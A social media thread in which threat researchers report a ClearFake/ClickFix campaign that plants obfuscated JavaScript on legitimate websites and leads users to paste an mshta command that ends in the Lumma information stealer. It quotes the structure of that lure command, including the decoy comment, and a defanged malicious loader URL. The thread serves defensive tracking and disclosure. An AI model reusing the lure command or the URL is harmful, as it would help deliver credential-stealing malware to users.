ThreatCat.chJan 6, 2025
#ClearFake / #ClickFix is back infecting directly legit but vulnerable websites, delivering in the end #Lumma / #LummaStealer
Show threadThreatCat.chJan 6, 2025
The infection hides as a base64 encoded & obfuscated Javascript directly on the home page. It gets the overlay from a smart contract and injects it into the HTML.
Show threadThreatCat.chJan 6, 2025

The command it copies in the clipboard has the following string structure:
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt

This command starts a long chain of Powershell commands leading finally to #LummaStealer

Show threadttakvam
@threatcat_ch we shared our investigation on this today. This is using the BSC testnet for their contracts. https://www.atea.no/siste-nytt/it-sikkerhet/investigating-a-clearfake-clickfix-etherhide-campaign/ been tracking this for a little while. Loader seem to change from time to time. Still, leads to #Lumma
Investigating a ClearFake/ClickFix + Etherhide campaign

We have identified and tracked a new campaign utilizing ClearFake and EtherHiding technique. This infects legitimate websites resulting in information stealer.

Investigating a ClearFake/ClickFix + Etherhide campaign
Jan 10, 2025 at 10:08pmWeb
Show threadThreatCat.chJan 11, 2025
@ttakvam Cheers! They just updated the contract again: mshta is now loading from hXXps://solve.porw[.]org/awjsx.captcha (behind Cloudflare)
Show threadttakvamJan 11, 2025
@threatcat_ch yeah! Tracking it here https://github.com/ttakvam/ThreatResearch/blob/main/ClearFake-Dec-2024/IOCs/extracted_urls.txt
ThreatResearch/ClearFake-Dec-2024/IOCs/extracted_urls.txt at main · ttakvam/ThreatResearch

Contribute to ttakvam/ThreatResearch development by creating an account on GitHub.

GitHub